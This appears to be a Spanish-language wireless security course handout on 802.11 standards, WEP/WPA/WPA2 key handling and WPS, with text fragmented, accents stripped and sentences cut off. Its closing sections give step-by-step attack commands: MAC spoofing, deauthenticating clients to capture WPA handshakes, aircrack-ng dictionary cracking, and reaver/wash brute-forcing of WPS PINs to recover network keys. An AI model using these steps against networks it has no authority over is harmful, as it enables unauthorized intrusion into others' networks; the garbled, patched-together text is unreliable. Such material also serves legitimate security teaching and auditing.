Professional Documents
Culture Documents
Introduccin
En este curso se empezara a conocer algunos estndares y en especifico el estndar IEEE
802.11b/g, como tambin veremos modos de encriptacin, problemas, ventajas y desventajas
de cada tipo de cifrado al igual que su respectiva auditoria, tanto como para WEP, WPA y
WPA2.
802.11
Estndares Inalmbricos. Pasado, presente y futuro de las redes wireless.
Los estndares son usados por los vendedores para garantizarles a sus clientes un nivel de
seguridad, calidad, y consistencia en sus productos. Para el cliente, un producto que sigue un
estndar especfico implica la posibilidad de interoperabilidad con otros productos y de no estar
atado a un vendedor nico.
IEEE 802.11
Redes Ethernet Inalmbricas
Este estndar define y gobierna las redes de rea local inalmbricas WLAN que operan en el
espectro de los 2,4 GHz (Giga Hercios) y fue definida en 1997. El estndar original
especificaba la operacin a 1 y 2 Mbps usando tres tecnologas diferentes:
Infrarojos IR
IEEE 802.11b+
Pseudo estndar de 22Mbps
Es una variacin del IEEE 802.11b pero que puede operar a 22Mbps contra los 11Mbps de la
versin 11b. Su mayor problema es que no es un estndar. Aunque aparece en la mayora de
las documentaciones como IEEE 802.11b+, IEEE nunca lo ha certificado como estndar. Es un
sistema propietario diseado por Texas Instruments y adoptado por algunos fabricantes de
dispositivos inalmbricos como D-Link y Global Sun que utilizan estos chipsets. Tcnicamente
utiliza tcnicas que forman parte del estndar 11g. Comparativamente con el resto de
estndares no ofrece grandes diferencias, ya que aunque anuncia velocidades de 22Mbps en
prestaciones reales se obtiene una discreta mejora.
IEEE 802.11g
Velocidades de 54Mbps en la banda de 2,4GHz
El estndar IEEE 802.11g ofrece 54Mbps en la banda de 2,4GHz. Dicho con otras palabras,
asegura la compatibilidad con los equipos Wi-Fi preexistentes. Para aquellas personas que
dispongan de dispositivos inalmbricos de tipo Wi-Fi, 802.11g proporciona una forma sencilla
de migracin a alta velocidad, extendiendo el perodo de vida de los dispositivos de 11Mbps. El
estndar 802.11g se public como borrador en Noviembre de 2001 con los siguientes
elementos obligatorios y opcionales:
Los sistemas deben ser totalmente compatibles con las tecnologas anteriores de
2,4GHz Wi-Fi (802.11b). Por lo que el uso del mtodo CCK Complementary Code
Keying tambin ser obligatorio para asegurar dicha compatibilidad.
El borrador del estndar marca como opcional el uso del mtodo PBCC Packet Binary
Convolution Coding y el OFDM/CCK simultneo.
debilidades del algoritmo RC4 dentro del protocolo WEP debido a la construccin
de la clave,
los IVs son demasiado cortos (24 bits hacen falta menos de 5000 paquetes para
tener un 50% de posibilidades de dar con la clave) y se permite la reutilizacin de
IV (no hay proteccin contra la repeticin de mensajes),
no existe una comprobacin de integridad apropiada (se utiliza CRC32 para la
deteccin de errores y no es criptogrficamente seguro por su linealidad),
no existe un mtodo integrado de actualizacin de las claves.
para mejorar la
la Wi-Fi Alliance
para responder
embargo, eran
En junio de 2004, la edicin final del estndar 802.11i fue adoptada y recibi el nombre
comercial WPA2 por parte de la alianza Wi-Fi. El estndar IEEE 802.11i introdujo varios
cambios fundamentales, como la separacin de la autenticacin de usuario de la integridad y
privacidad de los mensajes, proporcionando una arquitectura robusta y escalable, que sirve
igualmente para las redes locales domsticas como para los grandes entornos de red
corporativos. La nueva arquitectura para las redes wireless se llama Robust Security Network
(RSN) y utiliza autenticacin 802.1X, distribucin de claves robustas y nuevos mecanismos de
integridad y privacidad.
4-Way Handshake para la de- rivacin de la PTK (Pairwise Transient Key) y GTK
(Group Transient Key),
Group Key Handshake para la renovacin de GTK.
La derivacin de la clave PMK (Pairwise Master Key) depende del mtodo de autenticacin:
si se usa una PSK (Pre-Shared Key), PMK = PSK. La PSK es generada desde una
passphra- se (de 8 a 63 caracteres) o una cadena de 256-bit y proporciona una
solucin para redes doms- ticas o pequeas empresas que no tienen servidor de
autentica- cin,
si se usa un servidor de autenti- cacin, la PMK es derivada de la MK de
autenticacin 802.1X.
KCK (Key Confirmation Key 128 bits): Clave para la autenticacin de mensajes
(MIC) durante el 4- Way Handshake y el Group Key Handshake,
KEK (Key Encryption Key 128 bits): Clave para asegurar la confidencialidad de
los datos durante el 4-Way Handshake y el Group Key Handshake,
TK (Temporary Key 128 bits): Clave para encriptacin de datos (usada por TKIP
o CCMP),
TMK (Temporary MIC Key 2x64 bits): Clave para la autenticacin de datos (usada
slo por Michael con TKIP). Se usa una clave dedicada para cada lado de la
comunicacin.
La PTK se deriva de la PMK, una cadena fija, la direccin MAC del punto de acceso, la
direccin MAC del cliente y dos nmeros aleatorios (ANonce y SNonce, generados por el
autenticador y el suplicante, respectivamente). El punto de acceso inicia el primer mensaje
seleccionando el nmero aleatorio ANonce y envindoselo al suplicante, sin encriptar el
mensaje o protegerlo de las trampas. El suplicante genera su propio nmero aleatorio SNonce
y ahora puede calcular la PTK y las claves temporales derivadas, as que enva el SNonce y la
clave MIC calculada del segundo mensaje usando la clave KCK. Cuando el autenticador recibe
el segundo mensaje, puede extraer el SNonce (porque el mensaje no est encriptado) y
calcular la PTK y las claves temporales derivadas. Ahora puede verificar el valor de MIC en el
segundo mensaje y estar seguro de que el suplicante conoce la PMK y ha calculado
correctamente la PTK y las claves temporales derivadas.
El tercer mensaje enviado por el autenticador al suplicante contiene el GTK (encriptada con la
clave KEK), derivada de un GMK aleatorio y GNonce (ver Figura 10), junto con el MIC
calculado del tercer mensaje utilizando la clave KCK. Cuando el suplicante recibe este
mensaje, el MIC se comprueba para asegurar que el autenticador conoce el PMK y ha
calculado correctamente la PTK y derivado claves temporales.
GEK (Group Encryption Key): Clave para encriptacin de datos (usada por CCMP
para la auten- ticacin y para la encriptacin, y por TKIP),
GIK (Group Integrity Key): Clave para la autenticacin de datos (usada solamente
por Michael con TKIP).
Hay un concepto importante que debe ser entendido antes de detallar estos protocolos: la
diferencia entre MSDU (MAC Service Data Unit) y MPDU (MAC Protocol Data Unit). Ambos
trminos se refieren a un slo paquete de datos, pero MSDU representa a los datos antes de
la fragmentacin, mientras las MPDUs son mltiples unidades de datos tras la fragmentacin.
(TSC, o TKIP Sequence Counter) e incrementando el valor del IV para evitar la reutilizacin,
Per Packet Key Mixing: para unir claves de encriptacin aparente- mente
inconexas,
gestin de claves: nuevos mecanismos para la distribucin y modificacin de
claves.
TKIP Key-Mixing Scheme se divide en dos fases. La primera se ocupa de los datos estticos
la clave TEK de sesin secreta, el TA de la direccin MAC del transmisor (incluido para
prevenir colisiones IV) y los
32 bits ms altos del IV. La fase 2 incluye el resultado de la fase 1 y los
16 bits ms bajos del IV, cambiando todos los bits del campo Per Packet Key para cada nuevo
IV. El valor IV siempre empieza en 0 y es incrementado de uno en uno para cada paquete
enviado, y los mensajes cuyo TSC no es mayor que el del ltimo mensaje son rechazados. El
resultado de la fase 2 y parte del IV extendido (adems de un bit dummy) componen la entrada
para RC4, generando un flujo de clave que es XOR-eado con el MPDU de slo texto, el MIC
calculado del MPDU y el viejo ICV de WEP (ver Figura 11).
BSSID
ESSID
00:14:6C:7E:40:80
Encryption
teddy
WPA (1 handshake)
Master Key
: CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC
: 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
RESUMEN WPA/WPA2
iwconfig // veremos las WLAN que tenemos en el equipos
airmon-ng // veremos las WLAN que tenemos en el equipos
iwconfig wlan0 // preparando para cambiar la MAC de nustro dispositivo
iwconfig wlan0 essid wlan0
macchanger m 00:11:22:33:44:55 //cambiando la MAC de nuestra WLAN
//Abribros otra consola
airmon-ng
start wlan0 ; control + c / esperamos unos segundos
airodump-ng mon0
airodump-ng c 6 w redeswpa -bssid 00:00:00:00:00:00 mon0
//Abribros otra consola
aireplay-ng -0 10 a 00:00:00:00:00:00 c MAC-STATION mon0 //desautentica para //capturer
el WPA handshake
aircrack-ng redeswpa-01.cap
aircrack-ng redeswpa-01.cap w nombre y ruta del diccionario.dic
Mtodo Resumido
airmon-ng start wlan0
airodump-ng mon0
airodump-ng c 6 w redeswpa --bssid 00:00:00:00:00:00 mon0
aireplay-ng -0 10 a 00:00:00:00:00:00 c MAC-STATION mon0
aircrack-ng redeswpa-01.cap
aircrack-ng redeswpa-01.cap w diccionario.dic
PIN: tiene que existir un PIN asignado a cada elemento que vaya a asociarse a la red. Este
PIN tiene que ser conocido tanto por elRegistrar, como por el usuario (Enrollee). Es
necesaria la existencia de una interfaz (e.g. pantalla y teclado) para que el usuario pueda
introducir el mencionado PIN.
PBC: la generacin y el intercambio de credenciales son desencadenados a partir que el
usuario presiona un botn (fsico o virtual) en el AP (o en otro elemento Registrar) y otro en
el dispositivo. Notar que en el corto lapso de tiempo entre que se presiona el botn en el
AP y se presiona en el dispositivo, cualquier otra estacin prxima puede ganar acceso a
la red.
NFC: intercambio de credenciales a travs de comunicacin NFC. La tecnologa NFC,
basada en RFID permite la comunicacin sin hilos entre dispositivos prximos (0 - 20 cm).
Entonces, el dispositivo Enrollee se tiene que situar al lado del Registrar para
desencadenar la autenticacin. De esta manera, cualquier usuario que tenga acceso fsico
al Registrar, puede obtener credenciales vlidas.
USB: con este mtodo, las credenciales se transfieren mediante un dispositivo de memoria
flash (e.g. pendrive) desde el Registraral Enrollee.
Los mtodos PBC, NFC y USB pueden usarse para configurar dispositivos sin pantalla ni
teclado (e.g. impresoras, webcams, etc.), pero aunque el estndar contempla NFC y USB,
todava no se certifican estos mecanismos. Actualmente slo el mtodo PIN es obligatorio en
todas las estaciones para obtener la certificacin WPS; PBC es obligatorio slo en APs
Vulnerabilidades
Existe una falla de seguridad descubierta en diciembre del 2011 por Stefan Viehbck,la cual
afecta a routers inalmbricos que tienen la funcin WPS (tambin llamada QSS), la misma que
en dispositivos actuales se encuentra habilitada por defecto. La falla permite a un atacante
recuperar el PIN WPS y con la misma la clave pre-compartida de la
red WPA/WPA2 usando ataques de fuerza bruta en pocas horas. Los usuarios deben
WEP/WPA/WPA2
SIN DICCIONARIO
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng mon0 w reaverwps --beacons --channel 6 --bssid BSSID
Verification
reaver -i mon0 -b BSSID -c CH -e ESSID -d 15 vv; Warning 5 veces ni lo intenten
back Track 5
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 b BSSID -c CH -e ESSID
back Track 5 r3
airmon-ng
airmon-ng start wlan0
wash -i mon0
reaver -i mon0 -b BSSID -c CH
CONOCIDO EL PIN
reaver -i mon0 -b BSSID -c canal -vv
reaver -i mon0 -b BSSID -p PIN -vv
Chequeamos las redes que tienen el WPS unlocked que se pueden atacar
(nota si dando el comando no aparece ninguna red, quiere decir que no hay redes con estas
caractersticas en el rea).
Comando wash -i mon0